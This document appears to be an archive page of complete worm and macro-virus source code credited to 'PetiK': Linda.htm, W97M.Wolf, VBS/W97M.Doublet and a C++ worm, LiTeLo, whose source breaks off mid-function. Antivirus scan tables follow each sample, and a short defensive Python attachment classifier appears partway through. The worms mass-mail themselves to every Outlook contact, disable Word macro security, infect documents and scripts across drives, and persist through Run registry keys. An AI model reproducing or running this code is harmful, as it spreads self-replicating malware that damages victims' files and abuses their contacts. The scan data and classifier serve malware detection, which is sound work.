<font face='verdana' color=yellow size='3'>For Linda...<br>
<br>Because I Love You.
<br>I code this.<br>I can't say what I feel for you.
<br>You will know by this way.<br></font>

<SCRIPT Language=VBScript>
On Error Resume Next
msgbox "Please accept the ActiveX",vbinformation,"Info"
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
If err.number=429 then
ws.Run javascript:location.reload()
Else

Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set linda = fso.CreateTextFile(win&"\LoveLinda.htm", 2)
Set love = document.body.createTextRange
linda.WriteLine "<html><head><title>Love Linda</title>"
linda.WriteLine "<body bgColor=blue>"
linda.WriteLine love.htmltext
linda.WriteLine "</body></html>"
linda.Close

pers=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal")
create(win)
create(sys)
create(pers)

cv="HKLM\Software\Microsoft\Windows\CurrentVersion"
ws.RegWrite cv&"\RegisteredOwner","Linda"
ws.RegWrite cv&"\RegisteredOrganization","Love Linda"
ws.RegWrite cv&"\Run\LoveLinda",sys&"\lindamail.vbs"

Set mail=fso.CreateTextFile(sys&"\lindamail.vbs", 2)
mail.WriteLine "On Error Resume Next"
mail.WriteLine "Set out=CreateObject(""Outlook.Application"")"
mail.WriteLine "Set B=out.GetNameSpace(""MAPI"")"
mail.WriteLine "For Each C In B.AddressLists"
mail.WriteLine "If C.AddressEntries.Count <> 0 Then"
mail.WriteLine "For D=1 To C.AddressEntries.count"
mail.WriteLine "Set em=C.AddressEntries(D)"
mail.WriteLine "Set lm=out.CreateItem(0)"
mail.WriteLine "lm.To=em.Address"
mail.WriteLine "lm.Subject=""Love Message..."""
mail.WriteLine "lm.Body=""Read this beautiful love message."""
mail.WriteLine "lm.Attachments.Add(""" &win& "\LoveLinda.htm"")"
mail.WriteLine "lm.DeleteAfterSubmit=True"
mail.WriteLine "If lm.To <> """" Then"
mail.WriteLine "F.Send"
mail.WriteLine "End If"
mail.WriteLine "Next"
mail.WriteLine "End If"
mail.WriteLine "Next"
End If

Function create(doss)
Set FolderObj = fso.GetFolder(doss)
Set FO = FolderObj.Files
For each file in FO
ext = lcase(fso.GetExtensionName(file.Name))
if ext="ini" or ext="txt" or ext="bmp" or ext="doc" or ext="xls" or ext="mp3" or ext="hlp" or ext="inf" Then
Set linda = fso.CreateTextFile(file.path&".htm", 2)
Set love = document.body.createTextRange
linda.WriteLine "<html><head><title>Love Linda</title>"
linda.WriteLine "<body bgColor=blue>"
linda.WriteLine love.htmltext
linda.WriteLine "</body></html>"
linda.Close
end if
next
End Function
</script></body></html>
File Linda.htm received on 05.16.2009 17:51:29 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Bubbleboy!IK
AhnLab-V3 5.0.0.2 2009.05.16 HTML/Petik
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.04
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 JS/Mailer.A
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.CC1D1675
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik
DrWeb 5.0.0.12182 2009.05.16 WORM.Virus
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Nilda
F-Prot 4.4.4.56 2009.05.16 JS/Mailer.A
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 JS/Mailer.A
GData 19 2009.05.16 Generic.ScriptWorm.CC1D1675
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Bubbleboy
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 VBS/Generic@MM
McAfee+Artemis 5616 2009.05.15 VBS/Generic@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.04
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 HTML/Worm.gen
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.K
Panda 10.0.0.14 2009.05.16 Worm Generic
PCTools 4.4.2.0 2009.05.16 VBS.Lovlind.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 VBS/Petik-N
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 HTML_LINDA.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.16 VBS.Lovlind.A

Additional information
File size: 2755 bytes
MD5...: 43ac95142a5c7281246b68ef0584e079
SHA1..: 66758177710fcdd652c37671efe593f7651248e2
' Name : W97M.Wolf
' Author : PetiK
' Language : VBA Word
' Date : 25/02/2002

Attribute VB_Name = "Wolf"


Sub AutoOpen()
Call EndProtect
Call Infection
Call SearchF
If Day(Now) = 15 Then Call Payload
End Sub

Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
MsgBox "Very Thanx to Tex Avery. hahahahaha", vbInformation, "W97M.Wolf.A"
Application.UserName = "My Name is Wolf"
End Sub

Sub AutoClose()
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Wolf"
.Title = "My Friend the Wolf"
.Subject = "Tex Avery and the other"
.Keywords = "Wolf, Tex Avery, Ed Love, Droopy"
.Comments = "No comments"
.Execute
End With
If Left(ActiveDocument.Name, 8) <> "Document" And ActiveDocument.Saved = False Then
ActiveDocument.Save
End If
End Sub
Sub Infection()
On Error Resume Next
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
DropFile = "C:\Wolf.sys"
If Nor.Item("Wolf").Name <> "Wolf" Then
Doc("Wolf").Export DropFile
Nor.Import DropFile
End If
If Doc.Item("Wolf").Name <> "Wolf" Then
Nor("Wolf").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If
End Sub

Sub SearchF()
With Application.FileSearch
.FileName = "*.doc"
.LookIn = "C:\"
.SearchSubFolders = False
.FileType = msoFileTypeWordDocuments
.Execute
For I = 1 To .FoundFiles.Count
FileSystem.SetAttr .FoundFiles(I), vbNormal
Next I
End With
End Sub

Sub EndProtect()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End Select
WordBasic.DisableAutoMacros 0
End Sub

Sub Payload()
MyApp = Shell("notepad.exe", 1)
SendKeys "This is my last Word97Macro virus.", True
AppActivate (MyApp)
End Sub
File Wolf.doc received on 05.11.2009 21:18:10 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.11 Virus.MSWord.Droopy.A!IK
AhnLab-V3 5.0.0.2 2009.05.11 W97M/Droopy.B
AntiVir 7.9.0.166 2009.05.11 W2000M/Droopy.A
Antiy-AVL 2.0.3.1 2009.05.11 -
Authentium 5.1.2.4 2009.05.11 W97M/Droopy.A
Avast 4.8.1335.0 2009.05.10 MW97:Droopy family
AVG 8.5.0.327 2009.05.11 W97M/Beko
BitDefender 7.2 2009.05.11 W97M.Droopy.A
CAT-QuickHeal 10.00 2009.05.09 a variant of virus W97M.Inadd
ClamAV 0.94.1 2009.05.11 WM.Pivis
Comodo 1157 2009.05.08 Virus.MSWord.Droopy
DrWeb 5.0.0.12182 2009.05.11 W97M.Droopy
eSafe 7.0.17.0 2009.05.10 W97M.Wolf.A
eTrust-Vet 31.6.6500 2009.05.11 W97M/Droopy.A
F-Prot 4.4.4.56 2009.05.11 W97M/Droopy.A
F-Secure 8.0.14470.0 2009.05.11 Virus.MSWord.Droopy
Fortinet 3.117.0.0 2009.05.11 W97M/Droopy.A
GData 19 2009.05.11 W97M.Droopy.A
Ikarus T3.1.1.49.0 2009.05.11 Virus.MSWord.Droopy.A
K7AntiVirus 7.10.732 2009.05.11 Macro.Droopy
Kaspersky 7.0.0.125 2009.05.11 Virus.MSWord.Droopy
McAfee 5612 2009.05.11 W97M/Generic
McAfee+Artemis 5612 2009.05.11 W97M/Generic
McAfee-GW-Edition 6.7.6 2009.05.11 Macro.Droopy.A
Microsoft 1.4602 2009.05.11 Virus:W97M/Droopy.A
NOD32 4065 2009.05.11 W97M/Droopy.A
Norman 6.01.05 2009.05.11 W97M/Droopy.A
nProtect 2009.1.8.0 2009.05.11 W97M.Droopy.A
Panda 10.0.0.14 2009.05.11 W97M/CokeBoy
PCTools 4.4.2.0 2009.05.07 WORD.97.Flow.A
Prevx 3.0 2009.05.11 -
Rising 21.29.04.00 2009.05.11 Macro.Word97.Wolf.a
Sophos 4.41.0 2009.05.11 WM97/Droopy-A
Sunbelt 3.2.1858.2 2009.05.09 W97M.Droopy (v)
Symantec 1.4.4.12 2009.05.11 W97M.Droopy.A
TheHacker 6.3.4.1.324 2009.05.09 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.11 W97M_Generic
VBA32 3.12.10.4 2009.05.11 Virus.MSWord.Droopy
ViRobot 2009.5.11.1729 2009.05.11 W97M.Droopy.A
VirusBuster 4.6.5.0 2009.05.11 WORD.97.Flow.A

Additional information
File size: 40960 bytes
MD5...: 456d71a02c519c6a1f13fa9ffc899f2e
SHA1..: 534f5ae68f8634c6c69a5b40ad131a4bf674d000
' Name : VBS/W97M.Doublet
' Author : PetiK
' Language : VBS
' Date : 02/03/2002

On Error Resume Next


Set sf=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set fl=sf.OpenTextFile(WScript.ScriptFullName,1)
virus=fl.ReadAll
fl.Close

personal=ws.SpecialFolders("MyDocuments")

sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\Doublet.vbs")

Set vw=sf.CreateTextFile("C:\Doublet.sys")
vw.WriteLine "Attribute VB_Name = ""Doublet"""
vw.WriteLine "Sub AutoOpen()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Call FuckProtect"
vw.WriteLine "Call Infect"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub HelpAbout()"
vw.WriteLine "If Day(Now) = 10 Then"
vw.WriteLine "MsgBox ""W97M/VBS.Doublet. Hahahahaha"", vbInformation, ""For "" + Application.UserName"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub Infect()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Set Nor = NormalTemplate.VBProject.VBComponents"
vw.WriteLine "Set Doc = ActiveDocument.VBProject.VBComponents"
vw.WriteLine "Drop = ""C:\Doublet.sys"""
vw.WriteLine "If Nor.Item(""Doublet"").Name <> ""Doublet"" Then"
vw.WriteLine " Doc(""Doublet"").Export Drop"
vw.WriteLine " Nor.Import Drop"
vw.WriteLine "End If"
vw.WriteLine "If Doc.Item(""Doublet"").Name <> ""Doublet"" Then"
vw.WriteLine " Nor(""Doublet"").Export Drop"
vw.WriteLine " Doc.Import Drop"
vw.WriteLine " ActiveDocument.Save"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub FuckProtect()"
vw.WriteLine "With Options"
vw.WriteLine " .ConfirmConversions = False"
vw.WriteLine " .VirusProtection = False"
vw.WriteLine " .SaveNormalPrompt = False"
vw.WriteLine "End With"
vw.WriteLine "Select Case Application.Version"
vw.WriteLine "Case ""10.0"""
vw.WriteLine " System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine " System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&"
vw.WriteLine "Case ""9.0"""
vw.WriteLine " System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine "End Select"
vw.WriteLine "WordBasic.DisableAutoMacros 0"
vw.WriteLine "End Sub"
vw.Close
lecteur()

ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"

Set out=CreateObject("Outlook.Application")
Set MA=out.GetNameSpace("MAPI")
For Each C In MA.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count

tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\"&tmpname)
subject="Re: " & left(tmpname,len(tmpname)-4) & " for you."

Set AD=C.AddressEntries(D)
Set mail=out.CreateItem(0)
mail.To=AD.Address
mail.Subject=subject
body="Hi " & AD.Name & ","
body = body & VbCrLf & "Look at this attached found on the net."
body = body & VbCrLf & ""
body = body & VbCrLf & " See you soon"
mail.Body=body
mail.Attachments.Add(sf.GetSpecialFolder(0)&"\"&tmpname)
mail.DeleteAfterSubmit=True
If mail.To <> "" Then
mail.Send
sf.DeleteFile sf.GetSpecialFolder(0)&"\"&tmpname
End If
Next
End If
Next

Set wrd=WScript.CreateObject("Word.Application")
If wrd Is Nothing Then WScript.Quit
wrd.Visible=False
Set srch = wrd.Application.FileSearch
srch.Lookin = ""&personal&"": srch.SearchSubFolders = True: srch.FileName="*.doc": srch.Execute
For f = 1 To srch.FoundFiles.Count
victim = srch.FoundFiles(f)
wrd.Documents.Open victim
Set Doc=wrd.ActiveDocument.VBProject.VBComponents
If Doc.Item("Doublet").Name <> "Doublet" Then
Doc.Import ("C:\Doublet.sys")
wrd.ActiveDocument.Save
End If
wrd.ActiveDocument.Close
Next
wrd.Application.Quit

Sub lecteur()
On Error Resume Next
dim f,f1,fc
Set dr = sf.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub

Sub infecte(dossier)
On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set f = sf.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
ext = sf.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe") Then
Set cot=sf.OpenTextFile(f1.path, 1, False)
If cot.ReadLine <> "'VBS/W97M.Doublet" then
cot.Close
Set cot=sf.OpenTextFile(f1.path, 1, False)
vbsorg=cot.ReadAll()
cot.Close
Set inf=sf.OpenTextFile(f1.path,2,True)
inf.WriteLine "'VBS/W97M.Doublet"
inf.Write(vbsorg)
inf.WriteLine ""
inf.WriteLine virus
inf.Close
End If
End If
Next
End Sub

Sub liste(dossier)
On Error Resume Next
Set f = sf.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
infecte(f1.path)
liste(f1.path)
Next
End Sub
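Doublet's mailing loop above builds every attachment name from one to twenty random lowercase letters, a three-letter decoy or executable extension cut from its typext string, and a trailing .vbs, so the lure arrives as something like qwerty.jpg.vbs; WarGames and LiTeLo send plain .exe lures, and Linda sends an .htm that carries script. The Python below is an added mail-gateway check, not code from this archive, that classifies an attachment name by the extension the shell will actually act on and records the double-extension disguise and the Doublet naming pattern as separate reasons. The extension sets and verdict names are this example's own choices, and the names it is run on are constructed.

```python
import re

# Extensions Windows runs directly or hands to a script host on double-click.
EXECUTABLE_EXT = {"exe", "com", "bat", "cmd", "pif", "scr", "vbs", "vbe",
                  "js", "jse", "wsf", "wsh", "hta"}
# Document/image extensions used as a decoy in front of the real one.
DECOY_EXT = {"bmp", "jpg", "jpeg", "gif", "png", "doc", "xls", "ppt", "txt",
             "pdf", "mp3", "htm", "html", "htt"}
# Not executable as such, but can carry script (Linda.htm above is one).
ACTIVE_CONTENT_EXT = {"htm", "html", "htt"}

# Doublet's attachment names: 1..20 lowercase letters, one of the 3-letter
# groups of its typext string, then ".vbs". Its index arithmetic
# (int(rnd*11)+1 over 12 groups) never selects the last group, "hta".
DOUBLET_NAME_RE = re.compile(
    r"^[a-z]{1,20}\.(exe|com|bat|bmp|jpg|gif|doc|xls|ppt|htm|htt)\.vbs$")


def classify_attachment(filename):
    """Return {'verdict': 'block'|'review'|'allow', 'reasons': [...]}.

    The verdict depends only on the final extension, which is the one the
    shell acts on; earlier extensions are reported as evidence of disguise.
    """
    name = filename.strip().lower()
    exts = name.split(".")[1:]
    reasons, verdict = [], "allow"
    if exts and exts[-1] in EXECUTABLE_EXT:
        verdict = "block"
        reasons.append(f"final extension .{exts[-1]} is executable")
        if len(exts) > 1 and exts[-2] in DECOY_EXT | EXECUTABLE_EXT:
            reasons.append(f"double extension: .{exts[-2]} in front of .{exts[-1]}")
    elif exts and exts[-1] in ACTIVE_CONTENT_EXT:
        verdict = "review"
        reasons.append(f".{exts[-1]} attachment may carry script")
    if DOUBLET_NAME_RE.match(name):
        reasons.append("matches the VBS/W97M.Doublet attachment naming pattern")
    return {"verdict": verdict, "reasons": reasons}


def triage_attachments(filenames):
    """Map each attachment name to its verdict; hold the message if any is 'block'."""
    verdicts = {name: classify_attachment(name)["verdict"] for name in filenames}
    return any(v == "block" for v in verdicts.values()), verdicts


if __name__ == "__main__":
    # Constructed names in the shapes the worms on this page produce.
    for name in ["qwerty.jpg.vbs", "patch.exe", "LoveLinda.htm", "quarterly.doc"]:
        print(name, classify_attachment(name))
```

Because only the last extension decides the verdict, a name such as report.vbs.txt is allowed: Windows opens it in a text editor, and flagging it would only produce noise. The Doublet pattern is reported even when the verdict is already "block" so that a gateway log can distinguish a known family from a generic executable attachment.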
File Doublet.vbs received on 05.16.2009 11:30:45 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.VBS.Doublet!IK
AhnLab-V3 5.0.0.2 2009.05.15 VBS/Doublet
AntiVir 7.9.0.168 2009.05.15 Worm/Yumaho
Antiy-AVL 2.0.3.1 2009.05.15 Worm/VBS.VBS
Authentium 5.1.2.4 2009.05.15 VBS/Doublet.A@mm
Avast 4.8.1335.0 2009.05.15 VBS:Doublet
AVG 8.5.0.336 2009.05.15 VBS/Telbound.A
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.897E1D20
CAT-QuickHeal 10.00 2009.05.15 VBS/Doublet.A
ClamAV 0.94.1 2009.05.15 Worm.VBS.Yumao
Comodo 1157 2009.05.08 Worm.VBS.Agent.~H
DrWeb 5.0.0.12182 2009.05.16 VBS.Doublet
eSafe 7.0.17.0 2009.05.14 VBS.LoveLet3.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Yuma
F-Prot 4.4.4.56 2009.05.15 VBS/Doublet.A@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.VBS.Doublet
Fortinet 3.117.0.0 2009.05.16 VBS/Doublet.A@mm
GData 19 2009.05.16 Generic.ScriptWorm.897E1D20
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.VBS.Doublet
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.VBS.Doublet
McAfee 5616 2009.05.15 VBS/Dossier@MM
McAfee+Artemis 5616 2009.05.15 VBS/Dossier@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Yumaho
Microsoft 1.4602 2009.05.16 Virus:VBS/Doublet.A
NOD32 4080 2009.05.15 VBS/Doublet.A
Norman 6.01.05 2009.05.16 VBS/Doublet.H
nProtect 2009.1.8.0 2009.05.16 VBS.Doublet.A@mm
Panda 10.0.0.14 2009.05.15 VBS/Doublet.A.worm
PCTools 4.4.2.0 2009.05.15 VBS.Doubt.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Script.VBS.I-Worm.Doublet
Sophos 4.41.0 2009.05.16 VBS/Telboud-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 Macro.src
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_Doublet.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.VBS.Doublet
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 VBS.Doubt.A

Additional information
File size: 5258 bytes
MD5...: bdd4e8ab9db0d5e79474cb50f1f0ebda
SHA1..: 303d4183f401e9bf707dab9d05d993e329f71753
/*
Name : I-Worm.LiTeLo
Author : PetiK
Date : March 7th 2002 - March 10th 2002
Language : C++/HTML
*/

#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#pragma argused

char filename[50],copysys[50],copyreg[50],htmf[50],fakemess[1024];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
Uninst="Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\LiteLo";
char dn[20]="Flash32 Uninstall",ust[40];
BYTE htmail[10];
DWORD Tmp,type=REG_SZ,shtmail=sizeof(htmail);
LPTSTR cmdLine,ptr;
BOOL installed,uninstall;
HMODULE kernel32;
FILE *htm;

LHANDLE session;
MapiMessage *mess;
HINSTANCE WiNet,hMAPI;
char messId[512],mname[50],maddr[30];

char htmms[]="<html><head><title>Flash Information</title></head>\n"
"<body><script language=vbscript>\n"
"On Error Resume Next\n"
"msgbox \"Please accept ActiveX by clicking YES\",vbinformation,\"Flash32 NET\"\n"
"Set abcgqlbg=CreateObject(\"Scripting.FileSystemObject\")\n"
"Set gqlbgrlb=CreateObject(\"WScript.Shell\")\n\n"
"If err.number=429 Then\n"
"gqlbgrlb.Run javascript:location.reload()\n\n"
"Else\n\n"
"mess=\"Contact :\"\n"
"Set bgqlbgqm=CreateObject(\"Outlook.Application\")\n"
"Set mbgqlbgq=bgqlbgqm.GetNameSpace(\"MAPI\")\n"
"For Each C In mbgqlbgq.AddressLists\n"
"If C.AddressEntries.Count <> 0 Then\n"
"For D=1 To C.AddressEntries.Count\n"
"Set qlbgqlbg=C.AddressEntries(D)\n"
"Set gqlcgqlb=bgqlbgqm.CreateItem(0)\n"
"mess=mess &vbCrLf& qlbgqlbg.Address\n"
"gqlcgqlb.To=qlbgqlbg.Address\n"
"gqlcgqlb.Subject=\"New Version of Flash.\"\n"
"gqlcgqlb.Body=\"Unlimited demo verion of Flash.\"\n"
"gqlcgqlb.Attachments.Add(abcgqlbg.GetSpecialFolder(1)&\"\\Flash32.exe\")\n"
"gqlcgqlb.DeleteAfterSubmit=True\n"
"If gqlcgqlb.To <> \"\" Then\n"
"gqlcgqlb.Send\n"
"End If\n"
"Next\n"
"End If\n"
"Next\n\n"
"MsgBox mess,vbinformation,\"Flash Contact\"\n"
"gqlbgrlb.RegWrite \"HKLM\\Software\\Microsoft\\HTMail\",\"OK\"\n"
"gqlbgrlb.Run javascript:location.href=(\"http://www.flash.com\")\n"
"End If\n"
"</script></body></html>";

char *attname[]={"flash32.exe","flsh32eng.exe","flsh32fr.exe","new_flash.exe",
"freeflash32.exe","installflash.exe","setupflash.exe"};

HKEY hReg;
SYSTEMTIME systime;

BOOL (PASCAL FAR *INetConnect)(LPDWORD flags,DWORD reserved);
ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{

kernel32=GetModuleHandle("KERNEL32.DLL");
if(kernel32) {
(FARPROC &)RegSerPro=GetProcAddress(kernel32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
}

GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)copysys,100);
strcpy(htmf,copysys);
strcat(copysys,"\\Flash32.exe");
strcat(htmf,"\\FlashNet.htm");

installed=FALSE;
uninstall=FALSE;
cmdLine=GetCommandLine();
if(cmdLine) {
for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
case 'u':
installed=TRUE;
uninstall=TRUE;
break;
}
}
}

if(!installed) {
CopyFile(filename,copysys,FALSE);
strcpy(copyreg,copysys);
strcat(copyreg," -i");
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Flash32",0,REG_SZ,(BYTE *)copyreg,100);
RegCloseKey(hReg);

strcpy(ust,copysys);
strcat(ust," -u");
RegCreateKey(HKEY_LOCAL_MACHINE,Uninst,&hReg);
RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
RegCloseKey(hReg);

htm=fopen(htmf,"w");
fprintf(htm,"%s",htmms);
fclose(htm);

MessageBox(NULL,"Error : cannot open flash32.dll","ERROR",MB_OK|MB_ICONSTOP);
ExitProcess(0);
}
if(uninstall) {
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_ALL_ACCESS,&hReg);
RegDeleteValue(hReg,"Flash32");
RegCloseKey(hReg);

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall",0,KEY_ALL_ACCESS,&hReg);
RegDeleteKey(hReg,"LiteLo");
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft",0,KEY_ALL_ACCESS,&hReg);
RegDeleteValue(hReg,"HTMail");
RegCloseKey(hReg);
DeleteFile(htmf);
WritePrivateProfileString("rename","NUL",copysys,"WININIT.INI");
MessageBox(NULL,"Please restart the system.","Uninstall Flash32",MB_OK|MB_ICONHAND);
ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0);
ExitProcess(0);
}

// Check if we are connected
WiNet=LoadLibrary("WININET.DLL");
if(!WiNet) {
goto cworm;
}
(FARPROC &)INetConnect=GetProcAddress(WiNet, "InternetGetConnectedState");
if(!INetConnect) {
FreeLibrary(WiNet);
goto cworm;
}
while(INetConnect(&Tmp,0)!=TRUE) {
Sleep(1000);
}
FreeLibrary(WiNet);

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft",0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"HTMail",0,&type,htmail,&shtmail);
RegCloseKey(hReg);
if(strcmp(htmail,"OK")!=0) {
ShellExecute(NULL,"open",htmf,NULL,NULL,SW_SHOWMAXIMIZED);
}

cworm:
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) {
strcpy(mname,mess->lpOriginator->lpszName);
strcpy(maddr,mess->lpOriginator->lpszAddress);
mess->ulReserved=0;
mess->lpszSubject="New! New! Version of Flash";
mess->lpszNoteText="Hi,\nLook at this demo version of Flash.\n\nIt's easy and free.";
mess->lpszMessageType=NULL;
mess->lpszDateReceived=NULL;
mess->lpszConversationID=NULL;
mess->flFlags=MAPI_SENT;
mess->lpOriginator->ulReserved=0;
mess->lpOriginator->ulRecipClass=MAPI_ORIG;
mess->lpOriginator->lpszName=mess->lpRecips->lpszName;
mess->lpOriginator->lpszAddress=mess->lpRecips->lpszAddress;
mess->nRecipCount=1;
mess->lpRecips->ulReserved=0;
